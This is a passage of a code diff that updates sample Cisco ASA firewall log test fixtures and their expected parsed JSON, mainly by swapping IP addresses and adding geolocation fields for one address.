"192.168.2.134", + "ip": "192.168.2.134" }, "tags": [ "preserve_original_event" @@ -98,8 +98,8 @@ "MYHOSTNAME" ], "ip": [ - "192.0.2.134", - "192.0.2.15" + "192.168.2.134", + "192.168.2.15" ] }, "host": { @@ -107,8 +107,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:37.810238700Z", - "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.0.2.15/0 gaddr 192.0.2.134/57808 laddr 192.0.2.134/57808 type 8 code 0", + "ingested": "2021-12-09T13:34:15.786616300Z", + "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0", "code": "302021", "kind": "event", "action": "flow-expiration", @@ -122,7 +122,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "192.0.2.134", + "mapped_source_ip": "192.168.2.134", "icmp_type": 8, "icmp_code": 0 } 
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log index 2742be4b533..ca647162cfc 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log @@ -1,3 +1,3 @@ -<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -> OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000] +<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -> OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000] Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233 Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index fa8747c5677..898640c4657 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json 
@@ -5,9 +5,27 @@ "level": "notification" }, "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", "port": 53, - "address": "203.0.113.42", - "ip": "203.0.113.42" + "ip": "81.2.69.144" }, "syslog": { "facility": { @@ -16,8 +34,8 @@ }, "source": { "port": 27218, - "address": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244", - "domain": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "address": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244", + "domain": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" }, "tags": [ "preserve_original_event" @@ -47,16 +65,16 @@ }, "related": { "hosts": [ - "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" ], "ip": [ - "203.0.113.42" + "81.2.69.144" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.065426900Z", - "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -\u003e OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:34:15.994818500Z", + "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", 
@@ -120,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.065435Z", + "ingested": "2021-12-09T13:34:15.994826400Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -202,7 +220,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.065438800Z", + "ingested": "2021-12-09T13:34:15.994831900Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log index 73ea89341b0..5dc7589b754 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log 
@@ -1,72 +1,72 @@ -Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] -Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882 -Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) -Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 -Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to 
inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 +Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] +Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882 +Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) +Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 +Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP 
connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233 -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) -Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query -Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 29 2013 12:59:50: 
%ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) +Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query +Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -> dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.0.0.89(2000) hit-cnt 1 first hit 
[0x71a87d94, 0x0] -Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside -Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query -Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 
2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside +Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query +Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Dec 11 2018 08:01:24 : %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80) 
-Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 : %ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:39 : %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] -Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 : %ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to 
dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs +Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 : %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:39 : %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] +Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 : 
%ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416 -Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic +Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic 
-Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" +Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session -Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com -Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app -Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com -Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside -Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username) +Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic 
from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com +Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app +Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com +Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL 